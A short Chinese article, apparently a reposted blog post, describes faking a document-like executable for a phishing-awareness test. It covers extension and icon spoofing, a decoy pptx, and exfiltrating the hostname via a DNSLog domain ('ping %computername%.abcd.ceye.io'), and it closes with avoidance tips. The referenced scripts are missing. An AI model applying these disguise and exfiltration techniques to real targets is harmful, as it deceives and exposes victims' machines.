下面简单介绍一个伪造的例子。
目的:通过简单的软件伪造,验证是否有防范 工钓鱼的警惕性,确认是否有被钓鱼成功的用户。
首先考虑如何确认是否存在被钓鱼成功的用户,初步想法是将主机部分信息写入到文件,再使用ncat传输文件到服务器上。做法如下:
后续考虑到,由于ncat并不是系统自带命令,没法保证文件传输成功,另外可能路径没有权限写入文件等等问题,就放弃了。
于是考虑使用DNSLog平台外带数据,用于确认是否有钓鱼成功的用户。DNSLog平台可以监控DNS解析记录和HTTP访问记录,简单来说DNSLog平台提供了一个abcd.ceye.io的域名,那么可以把信息写在高级域名,本地ping %computername%.abcd.ceye.io,在DnsLog平台上即可看到该条域名解析记录。HTTP访问记录即访问平台提供的http页面时,访问记录也可以查看到。
做法如下:
解决了“确认是否有被钓鱼成功的用户”的问题后,接下来开始考虑如何进行软件伪造。
1.伪造文件拓展名
2.伪造文件图标
3.运行效果伪造
钓鱼脚本:
如果未勾选 显示隐藏的项目,解压后则只显示钓鱼文件,且执行后打开test.pptx文件。
钓鱼软件的使用场景:伪造为个人简历,发送给HR;伪造成学习资料、课件,上传到 络上;伪造为其他软件安装包。
如何避免被钓鱼软件 工:
1.收到陌生人发来的压缩包 或 从 络上下载压缩包时,先不要解压,使用压缩软件打开,查看里面的文件内容,这样既可以查看到隐藏文件,也可以查看到实际的文件类型。
2.文件管理器勾选查看隐藏的项目,显示文件后缀,打开文件前注意文件类型。
3.从官方渠道下载安装包。
声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!